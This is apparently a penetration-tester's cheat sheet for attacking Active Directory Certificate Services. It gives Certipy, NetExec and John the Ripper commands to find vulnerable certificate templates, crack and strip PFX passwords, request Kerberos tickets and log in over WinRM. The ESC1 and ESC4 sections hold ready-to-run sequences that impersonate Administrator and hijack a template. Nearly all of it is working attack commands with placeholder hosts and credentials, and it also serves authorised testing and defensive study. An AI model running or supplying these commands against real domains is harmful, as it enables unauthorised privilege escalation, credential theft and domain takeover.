####
ADCS
####

***********
Enumeration
***********

| https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html
|
| Certipy can list vulnerable ADCS templates for given user credentials.

.. code-block:: bash
    
    certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -vulnerable -stdout

|

| If it doesn't return vulns, you can review each template to see other users/groups you may want to leverage

.. code-block:: bash
    
    certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -stdout

|

| https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation

|

*****
Usage
*****

| How to use certificate // PFX file
| NetExec support PFX files

.. code-block:: bash

    nxc smb dc01.domain.htb -u administrator --pfx-cert administrator.pfx -x whoami

.. code-block:: bash

    # Crack password if any
    pfx2john.py legacyy_dev_auth.pfx > hashpfx
    /opt/john/run/john hashpfx -wordlist=/usr/share/wordlists/rockyou.txt 

    # Save PFX without protection
    certipy cert -export -pfx protected.pfx -password "password" -out unprotected.pfx

    # Request TGT (then pass the ticket)
    certipy auth -pfx unprotected.pfx -dc-ip 1.2.3.4 -domain 'domain.local' -username 'Administrator'

    # OR...
    # Extract cert and key from pfx
    certipy cert -pfx unprotected.pfx -nokey -out user.crt
    certipy cert -pfx unprotected.pfx -nocert -out user.key

    # Use cert and key to connect with winrm
    # https://gitlab.com/charles.gargasson/wintools/-/blob/main/winrmcert.rb
    ruby winrmcert.rb --ip 10.129.227.113 --cert user.crt --key user.key 

|

****
ESC1
****

| ESC1 - Misconfigured Certificate Templates
| https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc1-enrollee-supplied-subject-for-client-authentication
| 
| You need to check if the template allow impersonation ("Enrollee Supplies Subject" True)
| Then check if you are into one of enrollment rights groups.
| If you meet the requirements, generate a pfx certificate using the vulnerable template
| 

.. code-block:: bash

    DC_IP="1.2.3.4"
    DOMAIN="domain.com"
    CANAME="theCAname"
    TEMPLATE="VulnerableTemplate"
    IMPERSONATE="Administrator"
    UNPRIVILEGED_USER="beepboop"
    UNPRIVILEGED_USER_PASS='potate'
    certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -ca "$CANAME" -template "$TEMPLATE" -dc-ip $DC_IP -upn "$IMPERSONATE@$DOMAIN" -dns-tcp -ns $DC_IP -debug

|

****
ESC4
****

| ESC4 - Vulnerable Certificate Template Access Control
| https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc4-template-hijacking
|
| You manipulate the template to make it vulnerable to ESC1

.. code-block:: bash

    # Modify template (and backup the old one)
    certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -save-old

    # Exploit ESC1, retrieve impersonated user certificate
    certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -ca "$CANAME" -upn "$IMPERSONATE@$DOMAIN"

    # Restore config
    certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -configuration "${TEMPLATE}.json"

|